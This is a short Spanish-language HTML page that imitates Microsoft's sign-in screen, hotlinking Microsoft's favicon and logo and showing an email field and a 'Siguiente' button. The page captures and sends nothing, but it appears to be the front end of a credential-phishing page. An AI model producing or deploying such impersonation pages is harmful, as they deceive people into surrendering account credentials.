<!DOCTYPE html>
<html lang="es">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="icon" href="https://logincdn.msauth.net/16.000.30405.9/images/favicon.ico">
    <title>Iniciar sesión</title>
    <style>
        body {
            background: linear-gradient(135deg, #f0f4f8, #e0e8ee);
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
            font-family: Arial, sans-serif;
        }
        .login-container {
            background: white;
            padding: 40px;
            border-radius: 8px;
            box-shadow: 0px 4px 12px rgba(0, 0, 0, 0.1);
            text-align: center;
            width: 300px;
        }
        .login-container img {
            width: 50px;
        }
        .login-container h2 {
            font-size: 18px;
            margin-bottom: 20px;
        }
        .login-container input {
            width: 96%;
            padding: 10px;
            margin-bottom: 20px;
            border: 1px solid #ccc;
            border-radius: 4px;
        }
         .imgt img{
          width: 115px;
          height: 40px;
        }     
        .login-container button {
            background-color: #0078d4;
            color: white;
            border: none;
            padding: 10px;
            width: 105%;
            border-radius: 4px;
            font-size: 16px;
            cursor: pointer;
        }
        .login-container a {
            display: block;
            margin-top: 10px;
            color: #0078d4;
            text-decoration: none;
            font-size: 14px;
        }
az

    </style>
</head>
<body>
    <div class="login-container">
<div class="imgt">
        <img src="https://logincdn.msauth.net/shared/5/images/microsoft_logo_ee5c8d9fb6248c938fd0.svg" alt="Microsoft Logo"></div>
        <h2>Iniciar sesión</h2>
        <input type="email" placeholder="Correo electrónico, teléfono o Skype">
        <button>Siguiente</button>
        <a href="#">¿No tiene una cuenta? Cree una.</a>
        <a href="#">Opciones de inicio de sesión</a>
    </div>
</body>
</html>
